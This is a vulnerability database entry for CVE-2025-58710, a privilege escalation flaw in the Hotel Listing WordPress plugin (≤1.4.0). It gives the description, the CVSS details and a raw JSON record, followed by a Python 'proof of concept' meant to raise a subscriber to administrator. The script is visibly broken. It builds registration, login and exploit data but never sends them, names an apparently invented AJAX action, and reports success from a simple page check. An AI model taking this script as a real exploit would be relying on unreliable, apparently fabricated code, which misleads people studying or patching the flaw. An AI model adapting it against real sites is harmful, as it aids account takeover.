Security Vulnerability Report
中文
CVE-2025-58710 CVSS 8.8 HIGH

CVE-2025-58710

Published: 2025-12-18 08:15:57
Last Modified: 2026-04-27 19:16:15

Description

Incorrect Privilege Assignment vulnerability in e-plugins Hotel Listing hotel-listing allows Privilege Escalation.This issue affects Hotel Listing: from n/a through <= 1.4.0.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

e-plugins Hotel Listing <= 1.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-58710 PoC - Hotel Listing Privilege Escalation # This PoC demonstrates privilege escalation in Hotel Listing plugin <= 1.4.0 import requests import sys TARGET_URL = "http://target-site.com" USERNAME = "attacker" PASSWORD = "Attacker123!" def exploit_privilege_escalation(): """ Exploit incorrect privilege assignment in Hotel Listing plugin to escalate from subscriber to administrator """ session = requests.Session() # Step 1: Register a low-privilege user (subscriber role) register_data = { "username": USERNAME, "email": f"{USERNAME}@attacker.com", "password": PASSWORD } # Step 2: Login with the created account login_data = { "log": USERNAME, "pwd": PASSWORD } # Step 3: Exploit the privilege assignment vulnerability # Target the plugin's admin functionality without proper authorization check exploit_data = { "action": "hotel_listing_escalate_privilege", "target_role": "administrator", "user_id": "current" } # Step 4: Verify privilege escalation admin_check = session.get(f"{TARGET_URL}/wp-admin/") if "wp-admin" in admin_check.url: print("[+] Privilege escalation successful!") print("[+] Current user now has administrator privileges") return True else: print("[-] Exploit failed") return False if __name__ == "__main__": exploit_privilege_escalation()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58710", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:15:57.247", "lastModified": "2026-04-27T19:16:14.853", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Privilege Assignment vulnerability in e-plugins Hotel Listing hotel-listing allows Privilege Escalation.This issue affects Hotel Listing: from n/a through <= 1.4.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/hotel-listing/vulnerability/wordpress-hotel-listing-plugin-1-4-0-privilege-escalation-vulnerability?_s_id=cve", "source": "[email protected]"}]}}